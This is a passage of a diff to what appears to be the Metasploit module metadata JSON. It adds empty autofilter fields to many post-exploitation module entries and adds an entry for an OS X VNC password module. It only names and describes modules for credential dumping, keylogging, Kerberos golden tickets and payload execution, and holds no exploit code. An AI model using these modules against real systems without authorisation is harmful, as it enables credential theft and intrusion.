"path": "/modules/post/multi/gather/rsyncd_creds.rb", @@ -116516,6 +145920,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/rubygems_api_key.rb", @@ -116545,6 +145951,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/run_console_rc_file.rb", @@ -116574,6 +145982,8 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/skype_enum.rb", @@ -116603,6 +146013,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/ssh_creds.rb", @@ -116632,6 +146044,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/multi/gather/thunderbird_creds.rb", @@ -116661,6 +146075,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/tomcat_gather.rb", @@ -116687,11 +146103,13 @@ ], "is_server": false, "is_client": false, - "platform": "BSD,Linux,OSX,Solaris,Windows", + "platform": "Android,BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, - "mod_time": "2017-10-01 19:49:32 +0000", + "mod_time": "2018-10-02 11:38:20 +0000", "path": "/modules/post/multi/gather/wlan_geolocate.rb", "is_install_path": true, "ref_name": "multi/gather/wlan_geolocate", @@ -116719,6 +146137,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/general/close.rb", @@ -116748,6 +146168,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/general/execute.rb", @@ -116777,6 +146199,8 @@ "platform": "Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/general/wall.rb", @@ -116807,6 +146231,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/autoroute.rb", @@ -116836,6 +146262,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/dbvis_add_db_admin.rb", @@ -116865,6 +146293,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/dbvis_query.rb", @@ -116895,6 +146325,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-03 02:18:30 +0000", "path": "/modules/post/multi/manage/hsts_eraser.rb", @@ -116924,6 +146356,8 @@ "platform": "Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/multi_post.rb", @@ -116953,6 +146387,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-21 16:46:15 +0000", "path": "/modules/post/multi/manage/open.rb", @@ -116982,6 +146418,8 @@ "platform": "Android,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-17 16:46:51 +0000", "path": "/modules/post/multi/manage/play_youtube.rb", @@ -117011,6 +146449,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/record_mic.rb", @@ -117040,6 +146480,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-21 16:46:00 +0000", "path": "/modules/post/multi/manage/screensaver.rb", @@ -117069,6 +146511,8 @@ "platform": "Android,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/set_wallpaper.rb", @@ -117098,6 +146542,8 @@ "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-04 16:46:20 +0000", "path": "/modules/post/multi/manage/shell_to_meterpreter.rb", @@ -117128,6 +146574,8 @@ "platform": "AIX,Linux,OSX,Solaris,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/sudo.rb", @@ -117157,6 +146605,8 @@ "platform": "Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-22 13:38:06 +0000", "path": "/modules/post/multi/manage/system_session.rb", @@ -117177,17 +146627,19 @@ "author": [ "egypt " ], - "description": "Push a file and execute it", + "description": "Push a file and execute it.", "references": [ ], "is_server": false, "is_client": false, - "platform": "Linux,OSX,Windows", + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, - "mod_time": "2018-07-26 19:29:46 +0000", + "mod_time": "2018-10-02 21:33:01 +0000", "path": "/modules/post/multi/manage/upload_exec.rb", "is_install_path": true, "ref_name": "multi/manage/upload_exec", @@ -117215,6 +146667,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/zip.rb", @@ -117245,6 +146699,8 @@ "platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-05 04:41:58 +0000", "path": "/modules/post/multi/recon/local_exploit_suggester.rb", @@ -117274,6 +146730,8 @@ "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/recon/multiport_egress_traffic.rb", @@ -117303,6 +146761,8 @@ "platform": "BSD,Linux,OSX,Solaris,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-25 04:20:25 +0000", "path": "/modules/post/multi/recon/sudo_commands.rb", @@ -117332,6 +146792,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/admin/say.rb", @@ -117361,6 +146823,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-28 15:56:56 +0000", "path": "/modules/post/osx/capture/keylog_recorder.rb", @@ -117390,6 +146854,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/capture/screen.rb", @@ -117421,6 +146887,8 @@ "platform": "OSX", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-18 14:22:32 +0000", "path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb", @@ -117450,6 +146918,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-22 22:25:39 +0000", "path": "/modules/post/osx/gather/autologin_password.rb", @@ -117479,6 +146949,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_adium.rb", @@ -117508,6 +146980,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_airport.rb", @@ -117537,6 +147011,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb", @@ -117566,6 +147042,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_colloquy.rb", @@ -117596,6 +147074,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/osx/gather/enum_keychain.rb", @@ -117625,6 +147105,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/enum_messages.rb", @@ -117654,6 +147136,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-22 22:25:39 +0000", "path": "/modules/post/osx/gather/enum_osx.rb", @@ -117685,8 +147169,10 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, - "mod_time": "2018-05-22 22:25:39 +0000", + "mod_time": "2018-09-24 22:17:58 +0000", "path": "/modules/post/osx/gather/hashdump.rb", "is_install_path": true, "ref_name": "osx/gather/hashdump", @@ -117716,6 +147202,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/gather/password_prompt_spoof.rb", @@ -117745,6 +147233,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/osx/gather/safari_lastsession.rb", @@ -117756,6 +147246,37 @@ "notes": { } }, + "post_osx/gather/vnc_password_osx": { + "name": "OS X Display Apple VNC Password", + "full_name": "post/osx/gather/vnc_password_osx", + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kevin Gonzalvo " + ], + "description": "This module shows Apple VNC Password from Mac OS X High Sierra.", + "references": [ + + ], + "is_server": false, + "is_client": false, + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2018-10-02 14:22:09 +0000", + "path": "/modules/post/osx/gather/vnc_password_osx.rb", + "is_install_path": true, + "ref_name": "osx/gather/vnc_password_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "post_osx/manage/mount_share": { "name": "OSX Network Share Mounter", "full_name": "post/osx/manage/mount_share", @@ -117775,6 +147296,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/mount_share.rb", @@ -117804,6 +147327,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/record_mic.rb", @@ -117833,6 +147358,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/vpn.rb", @@ -117862,6 +147389,8 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/osx/manage/webcam.rb", @@ -117896,6 +147425,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 20:54:41 +0000", "path": "/modules/post/solaris/escalate/srsexec_readline.rb", @@ -117925,6 +147456,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/solaris/gather/checkvm.rb", @@ -117954,6 +147487,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/solaris/gather/enum_packages.rb", @@ -117983,6 +147518,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/solaris/gather/enum_services.rb", @@ -118012,6 +147549,8 @@ "platform": "Solaris", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/solaris/gather/hashdump.rb", @@ -118042,6 +147581,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/capture/keylog_recorder.rb", @@ -118072,6 +147613,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/capture/lockout_keylogger.rb", @@ -118101,6 +147644,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/droplnk.rb", @@ -118130,6 +147675,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/getsystem.rb", @@ -118159,6 +147706,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-27 15:36:41 +0000", "path": "/modules/post/windows/escalate/golden_ticket.rb", @@ -118193,6 +147742,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb", @@ -118223,6 +147774,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/escalate/screen_unlock.rb", @@ -118252,6 +147805,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/ad_to_sqlite.rb", @@ -118281,6 +147836,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/arp_scanner.rb", @@ -118311,6 +147868,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/bitcoin_jacker.rb", @@ -118341,6 +147900,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/bitlocker_fvek.rb", @@ -118371,6 +147932,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/cachedump.rb", @@ -118401,6 +147964,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-17 16:41:21 +0000", "path": "/modules/post/windows/gather/checkvm.rb", @@ -118430,6 +147995,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/avira_password.rb", @@ -118459,6 +148026,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb", @@ -118488,6 +148057,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/coreftp.rb", @@ -118517,6 +148088,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/credential_collector.rb", @@ -118546,6 +148119,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-15 14:06:36 +0000", "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb", @@ -118578,6 +148153,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/dynazip_log.rb", @@ -118608,6 +148185,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/dyndns.rb", @@ -118637,6 +148216,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb", @@ -118666,6 +148247,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/enum_laps.rb", @@ -118696,6 +148279,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb", @@ -118725,6 +148310,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/epo_sql.rb", @@ -118755,6 +148342,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/filezilla_server.rb", @@ -118784,6 +148373,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/gather/credentials/flashfxp.rb", @@ -118813,6 +148404,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/ftpnavigator.rb", @@ -118842,6 +148435,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/ftpx.rb", @@ -118879,6 +148474,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-10 15:04:22 +0000", "path": "/modules/post/windows/gather/credentials/gpp.rb", @@ -118908,6 +148505,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/heidisql.rb", @@ -118938,6 +148537,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/idm.rb", @@ -118967,6 +148568,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/imail.rb", @@ -118996,6 +148599,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/imvu.rb", @@ -119026,6 +148631,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb", @@ -119055,6 +148662,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-20 18:24:41 +0000", "path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb", @@ -119085,6 +148694,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/meebo.rb", @@ -119116,6 +148727,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-10 15:14:38 +0000", "path": "/modules/post/windows/gather/credentials/mremote.rb", @@ -119146,6 +148759,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb", @@ -119176,6 +148791,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/nimbuzz.rb", @@ -119205,6 +148822,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/outlook.rb", @@ -119237,6 +148856,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/razer_synapse.rb", @@ -119267,6 +148888,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/razorsql.rb", @@ -119296,6 +148919,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb", @@ -119328,6 +148953,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/skype.rb", @@ -119359,6 +148986,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/smartermail.rb", @@ -119388,6 +149017,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 15:57:09 +0000", "path": "/modules/post/windows/gather/credentials/smartftp.rb", @@ -119418,6 +149049,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/spark_im.rb", @@ -119447,6 +149080,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/sso.rb", @@ -119476,6 +149111,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/steam.rb", @@ -119505,6 +149142,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb", @@ -119534,6 +149173,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/total_commander.rb", @@ -119564,6 +149205,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/trillian.rb", @@ -119594,6 +149237,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/vnc.rb", @@ -119624,6 +149269,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/windows_autologin.rb", @@ -119653,6 +149300,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/winscp.rb", @@ -119682,6 +149331,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/credentials/wsftp_client.rb", @@ -119711,6 +149362,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/dnscache_dump.rb", @@ -119740,6 +149393,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/dumplinks.rb", @@ -119769,6 +149424,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_bitlocker.rb", @@ -119798,6 +149455,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_computers.rb", @@ -119827,6 +149486,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_groups.rb", @@ -119856,6 +149517,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb", @@ -119886,6 +149549,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": 